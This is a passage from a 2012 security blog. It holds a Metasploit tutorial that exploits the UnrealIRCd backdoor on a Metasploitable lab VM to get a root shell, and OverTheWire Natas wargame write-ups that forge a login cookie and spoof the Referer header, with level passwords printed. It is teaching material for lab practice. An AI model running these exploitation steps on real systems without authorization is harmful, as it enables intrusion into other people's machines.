Metasploit will print out its version including core and API version, how many exploits, auxiliary, and post modules it has loaded as well as how many payloads, encoders, and nops it has loaded. Then it presents the user (us) with the prompt, defined by "msf >".<br />
<br />
From here we can start to enter commands. How do we know what to do though? You can receive the help screen and possible options by entering the command:<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">help</span></blockquote>
Metasploit will output the following (I will only display a few lines since there are MANY options):<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">msf > help<br />Core Commands<br />=============</span> </blockquote>
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">Command Description<br /> ------- -----------<br /> ? Help menu<br /> back Move back from the current context<br /> banner Display an awesome metasploit banner<br /> cd Change the current working directory<br /> color Toggle color<br /> connect Communicate with a host</span> </blockquote>
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;"><...snipped...></span></blockquote>
<span style="font-family: inherit;">So we can now see all options available to us. A shortcut for "help" is also a question mark ("?"). Please note that the actual output may be formatted slightly differently since it is a copy from terminal to a blog. I will however try to have it look as close as I can to the original, and where needed have screenshots.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">The help command is a good reference in case you are stuck on a certain menu, or just want to learn more features of the msfconsole.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">To start off a pentest, we need to find the machines on the network. This step is the first step in actually pentesting a network. Note that before a pentest can occur you should have a written contract with explicit allowance for you to do so. Of course this is from a business point of view, so if you make a lab for practice like I did, you can skip right to the testing.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Finding all machines and attack vectors is known as "intelligence gathering" or "enumeration" and is the most important part of conducting a penetration test. There are an infinite number of ways to collect intelligence on a network, company, or single node, but I am going to concentrate on the normal ways of attacking a lab-environment.</span><br />
<span style="font-family: inherit;"><br /></span>
To find all targets on our network, we would just run an nmap scan against our subnet. There are many different options for nmap, including host OS discovery, stealthy scans, tracemaps, and many others. To make this tutorial quicker and easier, we are going to assume we know the IP of our target. Since you should be conducting this in a lab environment, you should know the IP of your Metasploitable machine, as well.<br />
<br />
My Metasploitable machine is located at 192.168.1.110 and receives its IP address through my router's DHCP server. I will try to make it as dynamic as possible when giving instructions, but if I use screenshots, IPs may be different than yours.<br />
<br />
Okay, now let's <i>finally</i> start exploiting this machine.<br />
As previously stated, we need to run host enumeration against this machine to see what type of services it has running and which ports are open. Inside of <i>msfconsole</i> we can utilize the database built in to save our nmap scans.<br />
Run this command to insure that our database is connected:<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">db_status</span></blockquote>
You should receive something along the lines of:<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">[*] postgresql connected to msf3dev</span></blockquote>
<span style="font-family: inherit;">If it spits out an error, then we need to connect our database; however, I will not get into this right now since I want to keep this tutorial on topic of exploitation and pentesting.</span><br />
<br />
To scan this target with nmap and have it placed in the Metasploit database, run the command "db_nmap".<br />
For this target, we are going to run a more thorough scan:<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">db_nmap -v -sS -A [ip-address]</span></blockquote>
<span style="font-family: inherit;">The previous nmap options are as follows:</span><br />
<blockquote class="tr_bq">
-v is "verbose" which means it will output more information for us to the screen.<br />
-sS is the "SYN" or "stealth" scan, which doesn't create a full connection to the host and is thus "stealthy". If you want to know more about this check out the nmap man page or other documention.<br />
-A is an all-encompassing option which includes Operating System detection, version detection (like the -sV option), script scanning, and traceroute.</blockquote>
Once you run this, a whole lotta stuff should come out at you. Once the scan is done you might be confused with your results, but I'll show you how to easily determine your attack vector.<br />
<br />
When your database has hosts in it, you can display which ones it has tracked with the "hosts" command.<br />
Mine looks like this right now:<br />
<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">msf > hosts<br />Hosts<br />=====<br />address mac name os_name os_flavor os_sp purpose info comments<br />------- --- ---- ------- --------- ----- ------- ---- --------<br />192.168.1.110 00:0C:29:35:72:58 Linux Ubuntu server </span> </blockquote>
<div>
Pretty cool, right? IT has the IP, OS, flavor of OS, MAC, and more!</div>
<div>
If we were to run a larger nmap scan, there would be many more hosts listed. This is a great way to keep track of which hosts are which while conducting a pentest.</div>
<div>
<br /></div>
<div>
But how does this help us with our exploitation? Metasploit also has the option to display all services detected by typing "services". This is my output after scanning the Metasploitable host:</div>
<div>
<div>
msf > services</div>
<div>
<br /></div>
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">Services<br />========<br />host port proto name state info<br />---- ---- ----- ---- ----- ----<br />192.168.1.110 21 tcp ftp open vsftpd 2.3.4<br />192.168.1.110 22 tcp ssh open OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0<br />192.168.1.110 23 tcp telnet open Linux telnetd<br />192.168.1.110 25 tcp smtp open Postfix smtpd<br />192.168.1.110 53 tcp domain open ISC BIND 9.4.2<br />192.168.1.110 80 tcp http open Apache httpd 2.2.8 (Ubuntu) DAV/2<br />192.168.1.110 111 tcp rpcbind open 2 rpc #100000<br />192.168.1.110 139 tcp netbios-ssn open Samba smbd 3.X workgroup: WORKGROUP<br />192.168.1.110 445 tcp netbios-ssn open Samba smbd 3.X workgroup: WORKGROUP<br />192.168.1.110 512 tcp exec open netkit-rsh rexecd<br />192.168.1.110 513 tcp login open <br />192.168.1.110 514 tcp tcpwrapped open <br />192.168.1.110 1099 tcp rmiregistry open GNU Classpath grmiregistry<br />192.168.1.110 1524 tcp ingreslock open <br />192.168.1.110 2049 tcp nfs open 2-4 rpc #100003<br />192.168.1.110 2121 tcp ftp open ProFTPD 1.3.1<br />192.168.1.110 3306 tcp mysql open MySQL 5.0.51a-3ubuntu5<br />192.168.1.110 5432 tcp postgresql open PostgreSQL DB 8.3.0 - 8.3.7<br />192.168.1.110 5900 tcp vnc open VNC protocol 3.3<br />192.168.1.110 6000 tcp x11 open access denied<br />192.168.1.110 6667 tcp irc open Unreal ircd<br />192.168.1.110 8009 tcp ajp13 open Apache Jserv Protocol v1.3<br />192.168.1.110 8180 tcp http open Apache Tomcat/Coyote JSP engine 1.1</span></blockquote>
</div>
<div>
Well that is quite a bit more useful. We can see the IP of the host with which port, protocol, and service is being used. On top of that, since we had version detection on, it displays more information about which version of the service is running.</div>
<div>
We can see port 6667 is running Unreal ircd. Unreal is a server for irc (internet relay chat), and the "d" at the end of ircd stands for "daemon" which means the port is listening for a service in the background.</div>
<div>
<br /></div>
<div>
Metasploit also has an awesome feature to find exploits, scanners, and other modules with the "search" option. We are going to run the following command to see if there's any modules for Unreal IRC:</div>
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">search unreal</span></blockquote>
This produces the following:<br />
<br />
<br />
msf > search unreal<br />
<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">Matching Modules<br />================<br /> Name Disclosure Date Rank Description<br /> ---- --------------- ---- -----------<br /> exploit/linux/games/ut2004_secure 2004-06-18 00:00:00 UTC good Unreal Tournament 2004 "secure" Overflow (Linux)<br /> exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 00:00:00 UTC excellent UnrealIRCD 3.2.8.1 Backdoor Command Execution<br /> exploit/windows/games/ut2004_secure 2004-06-18 00:00:00 UTC good Unreal Tournament 2004 "secure" Overflow (Win32)</span></blockquote>
<div>
Unfortunately since the output is so long, it has bumped the description to the following line, but it is still readable.</div>
<div>
We can see there are two exploits for Unreal Tournament 2004 for Linux and Windows each, but neither of these are useful. The middle result and interesting one is the exploit for UnrealIRCD 3.2.8.1 Backdoor Command Execution rated as "excellent".</div>
<div>
To load a module in Metasploit, we use the "use" command followed by the name of the module:</div>
<div>
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">msf > use exploit/unix/irc/unreal_ircd_3281_backdoor<br />msf exploit(unreal_ircd_3281_backdoor) > </span></blockquote>
</div>
<div>
As we can see, our prompt has changed to show that we are using an exploit module with the name. When we are using the "use" command, you can use "tab completion" which means if you're stuck, hitting the tab key will either complete the option, or if tapped twice, will display the options (if there are multiple). Most Linux users know this command since it is incredibly useful while moving through a file system or issuing commands quickly.</div>
<div>
<br /></div>
<div>
Now that we have the module loaded, issuing the command "show options" will of course show us the possible options.</div>
<div>
<blockquote>
<span style="font-family: Courier New, Courier, monospace;">msf exploit(unreal_ircd_3281_backdoor) > show options<br />Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):<br /> Name Current Setting Required Description<br /> ---- --------------- -------- -----------<br /> RHOST yes The target address<br /> RPORT 6667 yes The target port<br />Exploit target:<br /> Id Name<br /> -- ----<br /> 0 Automatic Target</span></blockquote>
<span style="font-family: inherit;">There are only two options possible, and only one target which is automatic since this is only for one operating system. Both the options are required which means the exploit cannot be run without these. We can see the port is already set since IRC servers run on the port 6667 as a normal, but if someone is trying to hide the service on a different port, this can be changed.</span><br />
<span style="font-family: inherit;">To set or change an option, issue the "set" command followed by the option you wish to change and finally the variable you want to change it to, like as follows:</span><br />
<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.1.110<br />RHOST => 192.168.1.110</span></blockquote>
Of course you would want to set your host IP to whatever the IP address is of your exploitable machine.<br />
<br />
Metasploit has certain "payloads" that we can use to determine what kind of code we want to execute when connecting to the host machine. We are going to statically set which payload to use in this tutorial to understand how to use them.<br />
Since I know which payload I want to use, we won't search for which one to use, but if you want to, you can use the "search" command followed by what you are looking for (e.g. unix shell).<br />
<br />
In this case we are going to use the netcat bind payload (if you have not used netcat, I highly suggest it. I will be writing a how-to for beginners on netcat eventually). To use this payload we run the command:<br />
<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">msf exploit(unreal_ircd_3281_backdoor) > set PAYLOAD cmd/unix/bind_netcat<br />PAYLOAD => cmd/unix/bind_netcat</span></blockquote>
<div>
Let's finally exploit this system! The exploit command has certain options such as -j which runs it as a job, or -z which does not interact with the system after exploitation. These can be used in different ways. To view all of them, use the help command followed by what command you need help with (e.g. <i>help exploit</i>).</div>
<div>
Running our exploit results in this:</div>
<div>
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">msf exploit(unreal_ircd_3281_backdoor) > exploit -z<br />[*] Started bind handler<br />[*] Connected to 192.168.1.110:6667...<br /> :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...<br /> :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead<br />[*] Sending backdoor command...<br />[*] Command shell session 3 opened (192.168.1.111:51923 -> 192.168.1.110:4444) at 2012-11-04 22:30:09 -0500<br />[*] Session x created in the background.</span></blockquote>
</div>
<div>
We see some output, and most notibly at the bottom "command shell session opened" and "session created in the background". If we didn't run this with the -z option and with no payload, the following output would have been produced:</div>
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">msf exploit(unreal_ircd_3281_backdoor) > exploit<br />[*] Started reverse double handler<br />[*] Connected to 192.168.1.110:6667...<br /> :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...<br /> :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead<br />[*] Sending backdoor command...<br />[*] Accepted the first client connection...<br />[*] Accepted the second client connection...<br />[*] Command: echo aeuPuvLl90yRmhts;<br />[*] Writing to socket A<br />[*] Writing to socket B<br />[*] Reading from sockets...<br />[*] Reading from socket B<br />[*] B: "aeuPuvLl90yRmhts\r\n"<br />[*] Matching...<br />[*] A is input...<br />[*] Command shell session x opened (192.168.1.111:4444 -> 192.168.1.110:49034) at 2012-11-03 23:08:41 -0400</span></blockquote>
<div>
That's a lot of stuff, but it's pretty easy to understand. First it connects to the socket (which is an IP and port), and receives back the two following lines. After it receives those, it sends the backdoor command and accepts two connections. Part of the exploit is echoing certain gibberish, which is then written to two sockets. Those sockets are then read and what is received is output. After the backdoor goes through, a command shell is opened and labeled as "session 1".</div>
<div>
<br /></div>
<div>
Speaking from the the most previous exploit, what we should have is a blank screen. Let's get back to what you should have done previously since this is just another option in our exploiting phase. Keep in mind when issuing exploits there are numerous ways to get where you need to be, and certain options are better than others.</div>
<div>
<br /></div>
<div>
Now, we have session x created in the background, how do we access it? Of course Metasploit has an awesome command for this, which is "sessions":</div>
<div>
<blockquote>
<span style="font-family: Courier New, Courier, monospace;">msf exploit(unreal_ircd_3281_backdoor) > sessions<br />Active sessions<br />===============<br /> Id Type Information Connection<br /> -- ---- ----------- ----------<br /> x shell unix 192.168.1.111:51923 -> 192.168.1.110:4444 (192.168.1.110)</span></blockquote>
Of course the IP addresses will be different than yours since we do not have the exact same network, but it should display your exploited system's IP address. The Id will also be the session # that you created, and is variable to how many sessions you have created.<br />
<br />
Finally how we interact with this session is to issue the following command:<br />
<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">msf exploit(unreal_ircd_3281_backdoor) > sessions -i x<br />[*] Starting interaction with x...<br />pwd<br />/etc/unreal<br />whoami<br />root<br />id<br />uid=0(root) gid=0(root)</span></blockquote>
So we can see, we interact with the session numbered x, then it brings us to that session which is a command prompt in the exploited machine. Running pwd displays our current working directory, whoami displays which user we have access as, and id displays our uid and gid permissions.<br />
<br />
This completes our tutorial on exploiting the Unreal IRCd backdoor vulnerability in Metasploit and basic tutorial for using msfconsole. If there are any questions as always post them and I will hopefully respond. Thanks for reading!</div>
<br /></div>
<br /></div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-65831363006221625112012-10-30T13:50:00.001-04:002022-12-20T10:46:16.867-05:00OverTheWire Wargame "Natas" Level 5 [How-To/Web]<div dir="ltr" style="text-align: left;" trbidi="on">
So we cracked <a href="http://www.hackavision.com/2012/10/overthewire-wargame-natas-level-4-how.html" target="_blank">Level 4</a> with some knowledge of HTTP headers and requests, and used a cool little app to help us out. Now we are on <a href="http://natas5.natas.labs.overthewire.org/" target="_blank">Level 5</a>, and after logging it it presents us with a weird page:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvJiJr-2TkMNgF5OFFBDV8xfLUQvhOGxycz-_28dUiLtIcdgtsa2xxKf_PQ51DHdsqrS34a0effIJA4uf5kFBJpNjOmGbJuKvmaP9D6QyQl8lBYg0lnr1wBaQ5tc7BLwWY3mhH8ZJS82g/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvJiJr-2TkMNgF5OFFBDV8xfLUQvhOGxycz-_28dUiLtIcdgtsa2xxKf_PQ51DHdsqrS34a0effIJA4uf5kFBJpNjOmGbJuKvmaP9D6QyQl8lBYg0lnr1wBaQ5tc7BLwWY3mhH8ZJS82g/s640/1.PNG" width="640" /></a></div>
<br />
Well wait, didn't we just log in? Why does it say we aren't?<br />
<br />
<a name='more'></a>Looks like the password didn't authenticate us correctly, OR there's something blocking our authentication even further.<br />
<br />
Right away, I knew what to do. What is something in a browser that holds certain information, including login information? Cookies! But how am I going to check out the delicious cookies? Javascript!<br />
<br />
Don't worry, the Javascript we'll be using is <i>really easy</i> to understand. I don't even know a lot of JS, but it's easy for me to do.<br />
<br />
Below is the Javascript that we can use to view the cookies on the current "document" (webpage):<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">alert(document.cookie);</span></blockquote>
<span style="font-family: inherit;">But how do we get this to run on the website? We put it into the navigation bar!</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmqYXiTPJ8c8MQXBeDfHg1SbRvGZS7fJhAkiNYExXfzsCXjRq-PL1RTHtZZTFvZgtndCItQMu_PDuE5nr2Jsv06p0nfQ6kn-E6JELWuzavWXVEg0tb9j29tFw6ZaSRtAb7JdG16B7ZeUg/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="95" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmqYXiTPJ8c8MQXBeDfHg1SbRvGZS7fJhAkiNYExXfzsCXjRq-PL1RTHtZZTFvZgtndCItQMu_PDuE5nr2Jsv06p0nfQ6kn-E6JELWuzavWXVEg0tb9j29tFw6ZaSRtAb7JdG16B7ZeUg/s400/2.png" width="400" /></a></div>
<br />
What this is doing is running a Javascript script denoted by the "javascript:" and it will pop up an "alert" window with the document cookie.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY84NnPQd9ntQNko3ZOSV-j6UcLpfbDZISdMeCDGSiuLOFUKm1zaeAGoKwLjzksQ1iGYjwHt_GMBFWKqvwt56q6oQtbO_aIc-pSt70EyER9ZF3bQjR6uTLi0hbwB-iX6hwkNMo2V6HIF4/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY84NnPQd9ntQNko3ZOSV-j6UcLpfbDZISdMeCDGSiuLOFUKm1zaeAGoKwLjzksQ1iGYjwHt_GMBFWKqvwt56q6oQtbO_aIc-pSt70EyER9ZF3bQjR6uTLi0hbwB-iX6hwkNMo2V6HIF4/s400/3.PNG" width="400" /></a></div>
<br />
Looks like a bunch of gibberish... but wait, what's that at the end!<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">loggedin=0</span></blockquote>
<span style="font-family: inherit;">Well, as we know in binary, 0 is false, and 1 is true, so it's saying we're not logged in! How do we go about changing this? We use Javascript again to exploit a XSS (cross side scripting) attack and change the value of the cookie.</span><br />
<br />
The Javascript this time is:<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">void(document.cookie="loggedin=1");</span></blockquote>
<span style="font-family: inherit;">Which means that the return type is "void" (returns nothing), and we want to set the cookie in the current document (webpage) with the value "loggedin=0". We know that value already exists in the cookie because we saw it, so it should change it from 0 (not authenticated) to 1 (authenticated).</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin91VygisXnoHzp0LMWRdwRxADbO1jLQH4EQo8GSlF7krWJzZIrn82eXzi-lXkNh2vBEFOni_ekO9ZbS_huud1yoU-T6SGu_NJNDed9h_xmcwe-SgFqnkdnDMVWQ1thiM1gPoUuOtMy_g/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="73" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin91VygisXnoHzp0LMWRdwRxADbO1jLQH4EQo8GSlF7krWJzZIrn82eXzi-lXkNh2vBEFOni_ekO9ZbS_huud1yoU-T6SGu_NJNDed9h_xmcwe-SgFqnkdnDMVWQ1thiM1gPoUuOtMy_g/s400/4.png" width="400" /></a></div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Now hit enter and lets see what happens.</span><br />
<span style="font-family: inherit;">Well, nothing should really happen that you can see, because we had the return type set as "void".</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">What you can do now, is either run the Javascript to view the cookie again, or just refresh to see:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidA08s-8ryQbKDqFuWJgqChyphenhyphen9qXisTi3DfiSXE9a-MaZynSi9q4XI4DZp_wBOzbkhQqCVwem_2WXvn22yPLdZPslhlMQDcB159bIy37V5gMrkEHsVuvnJY8T_e9H8Rl2m22JuN25f8wEs/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidA08s-8ryQbKDqFuWJgqChyphenhyphen9qXisTi3DfiSXE9a-MaZynSi9q4XI4DZp_wBOzbkhQqCVwem_2WXvn22yPLdZPslhlMQDcB159bIy37V5gMrkEHsVuvnJY8T_e9H8Rl2m22JuN25f8wEs/s640/5.PNG" width="640" /></a></div>
<span style="font-family: inherit;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-family: inherit;">So we see natas6:</span><span style="background-color: white;">mfPYpp1UBKKsx7g4F0LaRjhKKenYAOqU.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">On to <a href="http://natas6.natas.labs.overthewire.org/" target="_blank">Level 6</a>.</span></div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-5700726662471530792012-10-30T11:48:00.002-04:002022-12-20T10:46:17.438-05:00OverTheWire Wargame "Natas" Level 4 [How-To/Web]<div dir="ltr" style="text-align: left;" trbidi="on">
So <a href="http://www.hackavision.com/2012/10/overthewire-wargame-natas-level-3-how.html" target="_blank">Level 3</a> required a bit more knowledge of web servers and how searches parse them, but we got through it and are now on <a href="http://natas4.natas.labs.overthewire.org/" target="_blank">Level 4</a>.<br />
<br />
When we load up this level, we are welcomed by the following error:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg60etQw6CULOURR3zesKdE1Wbxiamv26WRgL_hcVi_YhdKhPz0m1ArnUPa_R39xaDLZ8hWO-ovy50tgDQte4BjGbODgiofuAiokyCnht5saT5KlqoZmSfRnsIPoLRNgBMWhYWzhdohjxE/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg60etQw6CULOURR3zesKdE1Wbxiamv26WRgL_hcVi_YhdKhPz0m1ArnUPa_R39xaDLZ8hWO-ovy50tgDQte4BjGbODgiofuAiokyCnht5saT5KlqoZmSfRnsIPoLRNgBMWhYWzhdohjxE/s640/1.PNG" width="640" /></a></div>
<br />
So it can see where we are coming from, and it doesn't like it.<br />
<br />
<a name='more'></a>There's a "Refresh page" button, lets click that and see what happens.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpXZbYbTy8jv2H86UNblaTLs8a71YAGp5cmiugWPW46EW1_9CDd19E3zbYagC2UadAUAc1-pavykCmkJaBm-cGXLKNUtPumyiR7mpmVtxChzz4aUdLvudO62AOueucP5gLuA07Dqo-Oqg/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpXZbYbTy8jv2H86UNblaTLs8a71YAGp5cmiugWPW46EW1_9CDd19E3zbYagC2UadAUAc1-pavykCmkJaBm-cGXLKNUtPumyiR7mpmVtxChzz4aUdLvudO62AOueucP5gLuA07Dqo-Oqg/s640/2.PNG" width="640" /></a></div>
<br />
So now it sees that we are just refreshing the page. A little knowledge of how messages are sent through HTTP is required here.<br />
When an HTTP request is made, there are certain fields that are filled in, and one of them is a "<a href="http://en.wikipedia.org/wiki/HTTP_referer" target="_blank">referer</a>".<br />
Maybe you can catch on where I'm going from here. What we need to do is hijack the request and change the referrer to be what it says it should be.<br />
<br />
How are we going to do this? Well, I'm using Chrome, and there's this nice little tool called "Referer Control" which can be found <a href="https://chrome.google.com/webstore/detail/referer-control/hnkcfpcejkafcihlgbojoidoihckciin" target="_blank">here</a>. Go ahead and install it (and if you're not, use Chrome already!) and I'll tell you how to configure it to help us out.<br />
<br />
Loading up this app brings us to the main screen of the configuration:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj7m8_x1L7XN2bwKQmA0RGe7a0quYgLy5oUco9tvB0QBpFjrps1XPUuN7siHcLP_UFHWZobOmyLOaJdn1U-xHFjqpgUnu5oF4wXrzIGk46eIgoWcuKWHy17y5JE-Pclx9rMABc6W89SQw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="500" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj7m8_x1L7XN2bwKQmA0RGe7a0quYgLy5oUco9tvB0QBpFjrps1XPUuN7siHcLP_UFHWZobOmyLOaJdn1U-xHFjqpgUnu5oF4wXrzIGk46eIgoWcuKWHy17y5JE-Pclx9rMABc6W89SQw/s640/3.PNG" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
For our setup, we are going to use the top section, where we can enter a website under "site filter".<br />
If we use the "default referrer for all other sites" it will change it for every single HTTP request we make.<br />
<br />
Enter "<a href="http://natas4.natas.labs.overthewire.org/index.php">http://natas4.natas.labs.overthewire.org/</a>" for the site, and select the "Custom" setting for the "referrer setting".<br />
From there, enter "<a href="http://natas4.natas.labs.overthewire.org/index.php">http://natas5.natas.labs.overthewire.org/</a>" for the referrer site as seen below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilFCKDVuZjd6CMy856LA5RTpX5euk3Ob-BhrqBxceK5UHq1Oi8YBU3RyjzfLO9alFBYbN56kH2g3KFOirKIk2oXiHX3wa31ryyPozmNnJEzbPv_vdqFk7z2-3mWufcCjjMCgZt_1P-mgU/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="84" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilFCKDVuZjd6CMy856LA5RTpX5euk3Ob-BhrqBxceK5UHq1Oi8YBU3RyjzfLO9alFBYbN56kH2g3KFOirKIk2oXiHX3wa31ryyPozmNnJEzbPv_vdqFk7z2-3mWufcCjjMCgZt_1P-mgU/s640/4.PNG" width="640" /></a></div>
<br />
<br />
The red X on the left is the delete button (not an error), so don't click on that unless you want to remove this specific site referral.<br />
<br />
Once this is done, go back to <a href="http://natas4.natas.labs.overthewire.org/" target="_blank">Level 4</a>, and you should see this (you might have to refresh the Referrer Control Settings):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuO2pGbFLglfnglQyf_p9_bK6Vg6n8Byx7HV6ggU0TqIfNeU7EJ3X1DCKSJg4TnWBA6lIuf8YbhMzPEpRkKVt81nqR0XBI7k8YtJ7M1ckCjIE4Hl5R5vhMf8g06naKE6GUGFnWaV0L7mA/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuO2pGbFLglfnglQyf_p9_bK6Vg6n8Byx7HV6ggU0TqIfNeU7EJ3X1DCKSJg4TnWBA6lIuf8YbhMzPEpRkKVt81nqR0XBI7k8YtJ7M1ckCjIE4Hl5R5vhMf8g06naKE6GUGFnWaV0L7mA/s640/5.PNG" width="640" /></a></div>
<br />
There we have it, natas5:V0p12qz30HEUU22dz7CZGHiFk3VdPA9Z.<br />
<br />
On to <a href="http://natas5.natas.labs.overthewire.org/" target="_blank">Level 5</a>!</div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-59627857597545784462012-10-30T10:38:00.001-04:002022-12-27T16:24:33.253-05:00OverTheWire Wargame "Natas" Level 3 [How-To/Web]<div dir="ltr" style="text-align: left;" trbidi="on">
After breaking <a href="http://www.hackavision.com/2012/10/overthewire-wargame-natas-level-2-how.html" target="_blank">Level 2</a> with some knowledge of how web servers hold their data, we move on to <a href="http://natas3.natas.labs.overthewire.org/" target="_blank">Level 3</a> which presents us with the same page as level 2:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0Pm8jn7f8BtkBEvFe4PChxFEvBAveTXF2bvLu8-RxCcfeRnr_Ez1snzDnC9ZCegq_4D1n3oxnDjJD6YovGe_h-7eb0PcwiROAXtFjYh7UuIqIhcdHI9AoYZ7nuFvR1qYRtQWW_qxB0ko/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0Pm8jn7f8BtkBEvFe4PChxFEvBAveTXF2bvLu8-RxCcfeRnr_Ez1snzDnC9ZCegq_4D1n3oxnDjJD6YovGe_h-7eb0PcwiROAXtFjYh7UuIqIhcdHI9AoYZ7nuFvR1qYRtQWW_qxB0ko/s1600/1.PNG" /></a></div>
<br />
<a name='more'></a>Doing the same thing as the other levels, we view the source and see this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
